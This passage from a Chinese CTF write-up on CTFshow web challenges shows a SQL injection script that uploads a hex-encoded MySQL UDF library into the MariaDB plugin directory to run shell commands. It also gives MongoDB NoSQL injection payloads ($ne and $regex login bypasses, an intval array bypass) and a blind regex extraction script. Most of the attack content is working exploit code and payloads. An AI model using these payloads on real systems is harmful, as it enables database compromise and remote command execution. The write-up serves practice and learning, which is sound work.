900000000000000000000000000000000000003000B00800A00000000000000000000000000000000000003000C00481100000000000000000000000000000000000003000D00581100000000000000000000000000000000000003000E00441200000000000000000000000000000000000003000F00C81200000000000000000000000000000000000003001000C81420000000000000000000000000000000000003001100D81420000000000000000000000000000000000003001200E81420000000000000000000000000000000000003001300F01420000000000000000000000000000000000003001400F81420000000000000000000000000000000000003001500781620000000000000000000000000000000000003001600901620000000000000000000000000000000000003001700101720000000000000000000000000000000000003001800000000000000000000000000000000000100000002000B00800A0000000000000000000000000000110000000400F1FF000000000000000000000000000000001C00000001001000C81420000000000000000000000000002A00000001001100D81420000000000000000000000000003800000001001200E81420000000000000000000000000004500000002000B00A00A00000000000000000000000000005B00000001001700101720000000000001000000000000006A00000001001700181720000000000008000000000000007800000002000B00200B0000000000000000000000000000110000000400F1FF000000000000000000000000000000008400000001001000D01420000000000000000000000000009100000001000F00C01400000000000000000000000000009F00000001001200E8142000000000000000000000000000AB00000002000B0010110000000000000000000000000000C10000000400F1FF00000000000000000000000000000000D40000000100F1FF90162000000000000000000000000000EA00000001001300F0142000000000000000000000000000F700000001001100E0142000000000000000000000000000040100000100F1FFF81420000000000000000000000000000D01000012000B00D10D000000000000D1000000000000001501000012000B00130F0000000000002F000000000000001E01000020000000000000000000000000000000000000002D01000020000000000000000000000000000000000000004101000012000C00481100000000000000000000000000004701000012000B00A90F0000000000000A000000000000005701000012000000000000000000000000000000000000006B01000012000000000000000000000000000000000000007F01000012000B00A20E00000000000067000000000000008D01000012000B00B30F0000000000005501000000000000960100001200000000000000000000000000000000000000A901000012000B00950B0000000000000A00000000000000C601000012000B00B50C000000000000F100000000000000D30100001200000000000000000000000000000000000000E50100001200000000000000000000000000000000000000F901000012000000000000000000000000000000000000000D02000012000B004C0B00000000000049000000000000002802000022000000000000000000000000000000000000004402000012000B00A60D0000000000002B000000000000005302000012000B00EB0B0000000000005D000000000000006002000012000B00480C0000000000000A000000000000006F02000012000000000000000000000000000000000000008302000012000B00420F0000000000006700000000000000910200001200000000000000000000000000000000000000A50200001200000000000000000000000000000000000000B902000012000B00520C0000000000006300000000000000C10200001000F1FF10172000000000000000000000000000CD02000012000B009F0B0000000000004C00000000000000E30200001000F1FF20172000000000000000000000000000E80200001200000000000000000000000000000000000000FD02000012000B00090F0000000000000A000000000000000D0300001200000000000000000000000000000000000000220300001000F1FF101720000000000000000000000000002903000012000000000000000000000000000000000000003C03000012000900880900000000000000000000000000000063616C6C5F676D6F6E5F73746172740063727473747566662E63005F5F43544F525F4C4953545F5F005F5F44544F525F4C4953545F5F005F5F4A43525F4C4953545F5F005F5F646F5F676C6F62616C5F64746F72735F61757800636F6D706C657465642E363335320064746F725F6964782E36333534006672616D655F64756D6D79005F5F43544F525F454E445F5F005F5F4652414D455F454E445F5F005F5F4A43525F454E445F5F005F5F646F5F676C6F62616C5F63746F72735F617578006C69625F6D7973716C7564665F7379732E63005F474C4F42414C5F4F46465345545F5441424C455F005F5F64736F5F68616E646C65005F5F44544F525F454E445F5F005F44594E414D4943007379735F736574007379735F65786563005F5F676D6F6E5F73746172745F5F005F4A765F5265676973746572436C6173736573005F66696E69007379735F6576616C5F6465696E6974006D616C6C6F634040474C4942435F322E322E350073797374656D4040474C4942435F322E322E35007379735F657865635F696E6974007379735F6576616C0066676574734040474C4942435F322E322E35006C69625F6D7973716C7564665F7379735F696E666F5F6465696E6974007379735F7365745F696E697400667265654040474C4942435F322E322E35007374726C656E4040474C4942435F322E322E350070636C6F73654040474C4942435F322E322E35006C69625F6D7973716C7564665F7379735F696E666F5F696E6974005F5F6378615F66696E616C697A654040474C4942435F322E322E35007379735F7365745F6465696E6974007379735F6765745F696E6974007379735F6765745F6465696E6974006D656D6370794040474C4942435F322E322E35007379735F6576616C5F696E697400736574656E764040474C4942435F322E322E3500676574656E764040474C4942435F322E322E35007379735F676574005F5F6273735F7374617274006C69625F6D7973716C7564665F7379735F696E666F005F656E64007374726E6370794040474C4942435F322E322E35007379735F657865635F6465696E6974007265616C6C6F634040474C4942435F322E322E35005F656461746100706F70656E4040474C4942435F322E322E35005F696E697400"
for i in range(0,21510, 5000):
    end = i + 5000
    payload.append(udf[i:end])

p = dict(zip(text, payload))

for t in text:
    url = base_url+"?id=';select unhex('{}') into dumpfile '/usr/lib/mariadb/plugin/{}.txt'--+&page=1&limit=10".format(p[t], t)
    r = requests.get(url)
    print(r.status_code)

next_url = base_url+"?id=';select concat(load_file('/usr/lib/mariadb/plugin/a.txt'),load_file('/usr/lib/mariadb/plugin/b.txt'),load_file('/usr/lib/mariadb/plugin/c.txt'),load_file('/usr/lib/mariadb/plugin/d.txt'),load_file('/usr/lib/mariadb/plugin/e.txt')) into dumpfile '/usr/lib/mariadb/plugin/udf.so'--+&page=1&limit=10"
rn = requests.get(next_url)

uaf_url=base_url+"?id=';CREATE FUNCTION sys_eval RETURNS STRING SONAME 'udf.so';--+"#导入udf函数
r=requests.get(uaf_url)
nn_url = base_url+"?id=';select sys_eval('cat /flag.*');--+&page=1&limit=10"
rnn = requests.get(nn_url)
print(rnn.text)

web249

第一次接触nosql的注入,题目用的应该是MongoDB。
参考文章:
NoSQL注入小笔记
冷门知识 — NoSQL注入知多少

$gt : >
$lt : <
$gte: >=
$lte: <=
$ne : !=<>
$in : in
$nin: not in
$all: all 
$or:or
$not: 反匹配(1.3.3及以上版本)
模糊查询用正则式:db.customer.find({'name': {'$regex':'.*s.*'} })
/**
* : 范围查询 { "age" : { "$gte" : 2 , "$lte" : 21}}
* : $ne { "age" : { "$ne" : 23}}
* : $lt { "age" : { "$lt" : 23}}
*/
//查询age = 22的记录
db.userInfo.find({"age": 22});
//相当于:select * from userInfo where age = 22;
//查询age > 22的记录
db.userInfo.find({age: {$gt: 22}});
//相当于:select * from userInfo where age > 22;

具体的姿势文章中也有介绍。
这题的话提示了flag在flag中,相当于找flag的值,正常肯定是id=flag,但是会返回error。
在这里插入图片描述

y4师傅说这题后端对id过滤了非数字,可能用的intval函数。这个函数在PHP特性那里出现过很多次了,利用这个特性:
在这里插入图片描述
对于非空的数组,intval会返回1,应该可以绕过intval的检验:

?id[]=flag

成功查到flag。

web250

  $query = new MongoDB\Driver\Query($data);
  $cursor = $manager->executeQuery('ctfshow.ctfshow_user', $query)->toArray();

//无过滤
  if(count($cursor)>0){
    $ret['msg']='登陆成功';
    array_push($ret['data'], $flag);
  }

没有任何的过滤,利用$ne就可以了:

username[$ne]=1&password[$ne]=1

正则也可以:

username[$regex]=.*&password[$regex]=.*

web251

按照上一题的姿势,但是出了admin账号的用户名密码:
在这里插入图片描述

再改成username不等于admin即可:

username[$ne]=admin&password[$ne]=1

不太懂为什么,可能是题目还额外增加了这样的限制?

web252

username既不能是admin,也不能是admin1,那就正则表达式:

username[$regex]=^[^a].*$&password[$ne]=1

至于.pretty()没什么:

mongodb的find().pretty()方法的作用。

使得查询出来的数据在命令行中更加美观的显示,不至于太紧凑。

web253

db.ctfshow_user.find({username:'$username',password:'$password'}).pretty()

没有回显,感觉应该是因为username和password被单引号包围了所以不行?但是联合注入咋注还是很懵。。看了一下yq1ng师傅,用的是盲注,根据前几题的经验,猜测username是flag,然后写个脚本即可:

"""
Author : feng
Time : 2021-2-14
"""
import requests

url="http://2184e9b4-619a-43dd-b8de-015a6a74fe3d.chall.ctf.show:8080/api/"

flag=""

for i in range(1,100):
    for j in "{-abcdefghijklmnopqrstuvwxyz0123456789}":
        payload="^{}.*$".format(flag+j)
        data={
            'username[$regex]':'flag',
            'password[$regex]':payload
        }
        r=requests.post(url=url,data=data)
        if r"\u767b\u9646\u6210\u529f" in r.text:
            flag+=j
            print(flag)
            if j=="}":
                exit()
            break

所以其实我的猜测是错的,这个单引号应该不想mysql那样会影响到,构造的东西还是可以实现的,只不过这题就是单纯的没回显罢了。

至此,CTFSHOW Web入门的SQL注入部分就结束了,花了9天时间把SQL注入刷了一遍,学习到了许许多多的东西,现在对于SQL注入也不再是懵懵的阶段了,对于各种的waf心中都有了应对的措施。接下来就是反序列化了,加油加油。

;